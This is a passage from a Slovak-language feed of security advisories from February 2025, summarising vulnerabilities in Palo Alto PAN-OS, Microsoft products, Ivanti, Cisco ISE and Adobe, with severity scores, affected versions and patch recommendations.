<p>Injekciu príkazov v plugine OpenConfig by vzdialený autentifikovaný útočník s oprávneniami administrátora zaslaním požiadaviek gNMI na webové manažmentové rozhranie PAN-OS mohol zneužiť na <strong>vzdialené spustenie príkazov</strong>. Príkazy sú spúšťané v&nbsp;kontexte používateľa „__opencnfig“, ktorý funguje ako správca zariadenia.</p>



<p>Pozn.: Zraniteľnosť je možné zneužiť len na PAN-OS, na ktorých je predmetný plugin aktivovaný.</p>



<p><strong>CVE-2025-0109 </strong>(CVSS skóre 5,5)</p>



<p>Zraniteľnosť sa nachádza vo webovom manažmentovom rozhraní a&nbsp;umožňuje <strong>mazanie určitých súborov</strong>. Zneužitie zraniteľnosti nevyžaduje autentifikáciu a umožňuje útočníkovi so sieťovým prístupom ku zraniteľnému zariadeniu cez <strong>používateľa „nobody“</strong> zmazanie niektorých logov a&nbsp;konfiguračných súborov, pričom nie je možné zmazať systémové súbory.</p>



<p><strong>CVE-2025-0111 </strong>(CVSS skóre 4,9)</p>



<p>Zraniteľnosť strednej závažnosti by vzdialený autentifikovaný útočník so sieťovým prístupom ku zraniteľnému zariadeniu mohol zneužiť na <strong>čítanie obsahu súborov prístupných pre používateľa „</strong><strong>nobody“</strong>, a teda získanie neoprávneného prístupu k citlivým údajom.</p>



<p><em>[Aktualizácia 20.2.2025]: Spoločnosť Palo Alto Networks upozornila na <strong>aktívne zneužívanie zraniteľnosti </strong>CVE-2025-0111. Zraniteľnosť je zneužívaná súčasne so zraniteľnosťami CVE-2025-0108 a CVE-2024-9474 a ich vzájomné zreťazenie umožňuje získanie úplnej kontroly nad zariadeniami (root prístup). Spoločnosť GreyNoise eviduje podstatný nárast pokusov o zneužitie týchto zraniteľností.</em></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Injekcia príkazov</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Palo Alto odporúča používať len produkty s platnou technickou podporou a bezodkladne aktualizovať zasiahnuté systémy aspoň na verziu:</p>



<ul>
<li>PAN-OS 11.2.4-h4</li>



<li>PAN-OS 11.1.6-h1</li>



<li>PAN-OS 10.2.13-h3</li>



<li>PAN-OS 10.1.14-h9</li>



<li>PAN-OS OpenConfig Plugin 2.1.2</li>
</ul>



<p>Výrobca taktiež odporúča obmedziť prístup k webovému rozhraniu len na dôveryhodné IP adresy a&nbsp;dodržiavať postupy best practice pre prevádzku a&nbsp;zabezpečenie PAN-OS, ktoré môžete nájsť <a href="https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431">online</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://securityadvisories.paloaltonetworks.com/CVE-2025-0108">https://securityadvisories.paloaltonetworks.com/CVE-2025-0108</a></li>



<li><a href="https://securityadvisories.paloaltonetworks.com/CVE-2025-0109">https://securityadvisories.paloaltonetworks.com/CVE-2025-0109</a></li>



<li><a href="https://securityadvisories.paloaltonetworks.com/CVE-2025-0110">https://securityadvisories.paloaltonetworks.com/CVE-2025-0110</a></li>



<li><a href="https://securityadvisories.paloaltonetworks.com/CVE-2025-0111">https://securityadvisories.paloaltonetworks.com/CVE-2025-0111</a></li>



<li><a href="https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2025-0108-auth-bypass-attempt?days=1">https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2025-0108-auth-bypass-attempt?days=1</a></li>



<li><a href="https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/">https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/</a></li>



<li><a href="https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-pan-os-authentication-bypass-vulnerability-cve-2025-0108#GreyNoise">https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-pan-os-authentication-bypass-vulnerability-cve-2025-0108#GreyNoise</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2043/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci februárového Patch Tuesday opravil 4 kritické zraniteľnosti</title>
		<link>/posts/2041</link>
					<comments>/posts/2041#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:42:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=2041</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala vo februári 2025 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z&#160;ktorých 26 umožňuje vzdialené vykonanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala vo februári 2025 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z&nbsp;ktorých 26 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti nachádzajúce sa v&nbsp;produktoch Microsoft Dynamics 365 Sales a Microsoft Excel a&nbsp;komponentoch Windows Lightweight Directory Access Protocol (LDAP) a DHCP Client Service možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu. Zraniteľnosti vo Windows Storage (CVE-2025-21391) a Windows Ancillary Function Driver for WinSock (CVE-2025-21418) sú v&nbsp;súčasnosti aktívne zneužívané útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure Network Watcher VM Extension</li>



<li>CBL Mariner 2.0 ARM</li>



<li>CBL Mariner 2.0 x64</li>



<li>Dynamics 365 Sales</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft AutoUpdate for Mac</li>



<li>Microsoft Edge (Chromium-based)</li>



<li>Microsoft Edge for Android</li>



<li>Microsoft Edge for iOS</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft HPC Pack 2016</li>



<li>Microsoft HPC Pack 2019</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft Outlook for Android</li>



<li>Microsoft PC Manager</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Surface Go 2</li>



<li>Microsoft Surface Go 3</li>



<li>Microsoft Surface Hub</li>



<li>Microsoft Surface Hub 2S</li>



<li>Microsoft Surface Hub 3</li>



<li>Microsoft Surface Laptop Go</li>



<li>Microsoft Surface Laptop Go 2</li>



<li>Microsoft Surface Laptop Go 3</li>



<li>Microsoft Surface Pro 7+</li>



<li>Microsoft Surface Pro 8</li>



<li>Microsoft Surface Pro 9 ARM</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.12</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Office Online Server</li>



<li>Surface Laptop 3 with Intel Processor</li>



<li>Surface Laptop 4 with AMD Processor</li>



<li>Surface Laptop 4 with Intel Processor</li>



<li>Surface Windows Dev Kit</li>



<li>Visual Studio Code</li>



<li>Visual Studio Code &#8211; JS Debug Extension</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Kritické zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2025-21177 </strong>(CVSS skóre 8,7)</p>



<p>Bližšie nešpecifikovanú zraniteľnosť v <strong>Microsoft Dynamics 365 Sales</strong> by vzdialený autentifikovaný útočník prostredníctvom <strong>SSRF (Server Side Request Forgery) útokov</strong> mohol zneužiť na <strong>eskaláciu privilégií</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.</p>



<p><strong>CVE-2025-21376 </strong>(CVSS skóre 8,1)</p>



<p>Komponent <strong>Windows Lightweight Directory Access Protocol (LDAP)</strong> obsahuje kritickú zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník prostredníctvom <strong>špeciálne vytvorených LDAP volaní</strong> mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Úspešné zneužitie zraniteľností <strong>vyžaduje, aby útočník vyhral súbeh procesov</strong>.</p>



<p><strong>CVE-2025-21379 </strong>(CVSS skóre 7,1)</p>



<p>Použitie odalokovaného miesta v&nbsp;pamäti v&nbsp;rámci komponentu <strong>DHCP Client</strong> by útočník nachádzajúci sa v&nbsp;rovnakom sieťovom segmente mohol prostredníctvom tzv. machine-in-the-middle útoku zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>.</p>



<p><strong>CVE-2025-21381 </strong>(CVSS skóre 7,8)</p>



<p>Kritická zraniteľnosť v <strong>Microsoft Excel</strong> spočíva v&nbsp;dereferencii nedôveryhodných ukazovateľov a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí stiahnuť a&nbsp;otvoriť špeciálne vytvorený súbor.</p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Aktívne zneužívané zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2025-21391 </strong>(CVSS skóre 7,1)</p>



<p>Nesprávny preklad odkazov pred prístupom k&nbsp;súborom v&nbsp;rámci komponentu <strong>Windows Storage</strong> by lokály autentifikovaný útočník mohol zneužiť na <strong>eskaláciu privilégií</strong> umožňujúcu <strong>zmazanie súborov na súborovom systéme</strong>. Zmazanie súborov kritických pre beh systému môže viesť k&nbsp;zneprístupneniu služby.</p>



<p><strong>CVE-2025-21418 </strong>(CVSS skóre 7,8)</p>



<p>Pretečenie medzipamäte haldy v&nbsp;rámci <strong>Windows Ancillary Function Driver</strong> možno lokálne zneužiť na <strong>eskaláciu privilégií</strong> na úroveň SYSTEM. Zneužitie zraniteľnosti vyžaduje autentifikáciu.</p>



<p>Uvedené zraniteľnosti sú v&nbsp;súčasnosti aktívne zneužívané útočníkmi.</p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Ostatné významné zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2025-21377 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť v&nbsp;operačnom systéme <strong>Windows</strong> spočívajúcu v&nbsp;externej kontrole názvu alebo cesty súboru by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na <strong>získanie autentifikačných NTLMv2 hashov</strong>. <strong>Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa</strong>, ktorý musí na súbor kliknúť alebo vykonať inú operáciu, ako jeho otvorenie alebo spustenie.</p>



<p><strong>26 vysoko závažných</strong> zraniteľností v <strong>CBL Mariner a Microsoft Visual Studio 2019</strong> (CVE-2023-32002), <strong>Windows Telephony Service</strong> (CVE-2025-21190, CVE-2025-21200, CVE-2025-21201, CVE-2025-21371, CVE-2025-21406, CVE-2025-21407), <strong>Microsoft High Performance Compute (HPC) Pack</strong> (CVE-2025-21198), <strong>Windows Routing and Remote Access Service (RRAS)</strong> (CVE-2025-21208, CVE-2025-21410), <strong>Microsoft Edge</strong> (CVE-2025-21279, CVE-2025-21283, CVE-2025-21342, CVE-2025-21408), <strong>Microsoft Digest Authentication</strong> (CVE-2025-21368, CVE-2025-21369), <strong>Microsoft Excel</strong> (CVE-2025-21386, CVE-2025-21387, CVE-2025-21390, CVE-2025-21394), <strong>Microsoft Office</strong> (CVE-2025-21392, CVE-2025-21397) a <strong>Microsoft SharePoint Server</strong> (CVE-2025-21400) možno zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladné nasadenie februárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete&nbsp;<a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Feb">tu</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Feb">https://msrc.microsoft.com/update-guide/releaseNote/2025-Feb</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21177">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21177</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21376">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21376</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21379">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21379</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21381">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21381</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21391">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21391</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21418">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21418</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/advisory/CVE-2025-21194">https://msrc.microsoft.com/update-guide/advisory/CVE-2025-21194</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/advisory/CVE-2025-21377">https://msrc.microsoft.com/update-guide/advisory/CVE-2025-21377</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2041/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Ivanti ICS, IPS, ISAC a CSA</title>
		<link>/posts/2039</link>
					<comments>/posts/2039#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:40:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2039</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), Ivanti Secure Access Client...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), Ivanti Secure Access Client (Ivanti Secure Access Client) a Ivanti Cloud Services Application (CSA), ktoré opravujú 10 zraniteľností, z čoho 4 sú označené ako kritické. Kritické zraniteľnosti umožňujú vzdialené vykonanie kódu, získanie neoprávneného prístupu k&nbsp;citlivým údajom a&nbsp;vykonanie neoprávnených zmien v&nbsp;systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Connect Secure vo verziách starších ako 22.7R2.6</li>



<li>Ivanti Policy Secure vo verziách starších ako 22.7R1.3</li>



<li>Ivanti Secure Access Client vo verziách starších ako 22.8R1</li>



<li>Ivanti Cloud Services Application vo verziách starších ako 5.0.5</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Ivanti Connect Secure, Ivanti Policy Secure:</u></strong></p>



<p><strong>CVE-2024-38657 </strong>(CVSS skóre 9,1)</p>



<p>Zraniteľnosť v&nbsp;Ivanti ICS a&nbsp;IPS spočívajúcu v&nbsp;možnosti externe kontrolovať názov súboru by vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora mohol zneužiť na <strong>vytvorenie a&nbsp;modifikáciu súborov na súborovom systéme</strong>.</p>



<p><strong>CVE-2025-22467 </strong>(CVSS skóre 9,9)</p>



<p>Pretečenie vyrovnávacej pamäte zásobníka v&nbsp;rámci Ivanti ICS možno zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti vyžaduje autentifikáciu.</p>



<p><strong>CVE-2024-10644 </strong>(CVSS skóre 9,1)</p>



<p>Bližšie nešpecifikovanú zraniteľnosť v&nbsp;Ivanti ICS a&nbsp;IPS by vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Ivanti Cloud Services Application:</u></strong></p>



<p><strong>CVE-2024-47908 </strong>(CVSS skóre 9,1)</p>



<p>Zraniteľnosť sa nachádza vo webovej administratívnej konzole Ivanti CSA a&nbsp;vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Ivanti Secure Access Client:</u></strong></p>



<p><strong>CVE-2024-13813 </strong>(CVSS skóre 7,1)</p>



<p>Vysoko závažná zraniteľnosť v&nbsp;Ivanti SAC spočíva v&nbsp;nedostatočnom nastavení oprávnení a&nbsp;umožňuje lokálnemu autentifikovanému útočníkovi <strong>zmazať ľubovoľné súbory na súborovom systéme</strong>.</p>



<p>Ostatné zraniteľnosti strednej závažnosti možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k&nbsp;citlivým údajom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong><strong></strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong><strong></strong></li>



<li><strong>Eskalácia privilégií</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Ivanti odporúča bezodkladnú aktualizáciu Ivanti Connect Secure na verziu 22.7R2.6, Ivanti Policy Secure na verziu 22.7R1.3, Ivanti Secure Access Client na verziu 22.8R1 a Ivanti Cloud Services Application na verziu 5.0.5.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.ivanti.com/blog/february-security-update">https://www.ivanti.com/blog/february-security-update</a></li>



<li><a href="https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs">https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-47908-CVE-2024-11771">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-47908-CVE-2024-11771</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2039/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v Cisco Identity Services Engine</title>
		<link>/posts/2037</link>
					<comments>/posts/2037#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:38:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2037</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoj produkt Cisco Identity Services Engine a Cisco Identity Services Engine &#8211; Passive Identity...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre svoj produkt Cisco Identity Services Engine a Cisco Identity Services Engine &#8211; Passive Identity Connector, ktoré opravujú 2 kritické zraniteľnosti. Zraniteľnosti s&nbsp;označením CVE-2025-20124 a CVE-2025-20125 možno zneužiť na vzdialené vykonanie príkazov, eskaláciu privilégií, vykonanie neoprávnených zmien v&nbsp;systéme a&nbsp;zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Identity Services Engine (ISE) vo verziách starších ako 3.0 (vrátane)</li>



<li>Cisco Identity Services Engine (ISE) 3.1 vo verziách starších ako 3.1P10</li>



<li>Cisco Identity Services Engine (ISE) 3.2 vo verziách starších ako 3.2P7</li>



<li>Cisco Identity Services Engine (ISE) 3.3 vo verziách starších ako 3.3P4</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20124 </strong>(CVSS skóre: 9,9)</p>



<p>Kritická CVE-2025-20124 sa nachádza v API rozhraní Cisco ISE a ISE-PIC a spočíva v nezabezpečenej deserializácii bajtových prúdov Java (eng. byte streams). Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených serializovaných objektov Java cez API mohol zneužiť na eskaláciu privilégií a vzdialené vykonanie príkazov v kontexte používateľa root.</p>



<p><strong>CVE-2025-20125 </strong>(CVSS skóre: 9,1)</p>



<p>Zraniteľnosť v API rozhraní spočíva v chýbajúcej autorizácii vybraných koncových bodov API a nesprávnom overovaní používateľských vstupov. Zaslaním špeciálne vytvorených HTTP požiadaviek ju možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, modifikáciu konfigurácie zariadenia alebo vyvolanie jeho reštartu.</p>



<p>Pozn.: Úspešné zneužitie predmetných zraniteľností vyžaduje znalosť platných prihlasovacích údajov pre ľubovoľné administrátorské účty na ISE, pričom postačujú aj účty s read-only oprávneniami.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Cisco odporúča bezodkladnú aktualizáciu zraniteľných inštancií Cisco Identity Services Engine na verzie 3.1P10, 3.2P7, 3.3P4 alebo 3.4.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-multivuls-FTW9AOXF">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-multivuls-FTW9AOXF</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-cisco-ise-bug-can-let-attackers-run-commands-as-root/">https://www.bleepingcomputer.com/news/security/critical-cisco-ise-bug-can-let-attackers-run-commands-as-root/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2037/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/2035</link>
					<comments>/posts/2035#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:36:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2035</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InDesign, Commerce, Substance 3D Stager, InCopy, Illustrator, Substance 3D Designer a Photoshop...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty InDesign, Commerce, Substance 3D Stager, InCopy, Illustrator, Substance 3D Designer a Photoshop Elements, ktoré opravujú 45 zraniteľností, z&nbsp;čoho 23 je označených ako kritických. Kritické zraniteľnosti by útočník mohol zneužiť na vykonanie škodlivého kódu, obídenie bezpečnostných prvkov a&nbsp;eskaláciu privilégií.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe InDesign ID20.X vo verziách starších ako ID20.1</li>



<li>Adobe InDesign ID19.X vo verziách starších ako ID19.5.2</li>



<li>Adobe InCopy 20.X vo verziách starších ako 20.1</li>



<li>Adobe InCopy 19.X vo verziách starších ako 19.5.2</li>



<li>Adobe Illustrator 2025 29.X vo verziách starších ako 29.2.1</li>



<li>Adobe Illustrator 2024 28.X vo verziách starších ako 28.7.4</li>



<li>Adobe Adobe Substance 3D Designer 14.X vo verziách starších ako 14.1</li>



<li>Adobe Photoshop Elements for macOS 2025.X vo verziách starších ako 2025.1 [build: 20250124.PSE.f552973b, 20250124.PSE.5345f07d (Mac ARM)]</li>



<li>Adobe Substance 3D Stager 3.X vo verziách starších ako 3.1.1</li>



<li>Adobe Commerce 2.4.8 vo verziách starších ako 2.4.8-beta2</li>



<li>Adobe Commerce 2.4.7 vo verziách starších ako 2.4.7-p4</li>



<li>Adobe Commerce 2.4.6 vo verziách starších ako 2.4.6-p9</li>



<li>Adobe Commerce 2.4.5 vo verziách starších ako 2.4.5-p11</li>



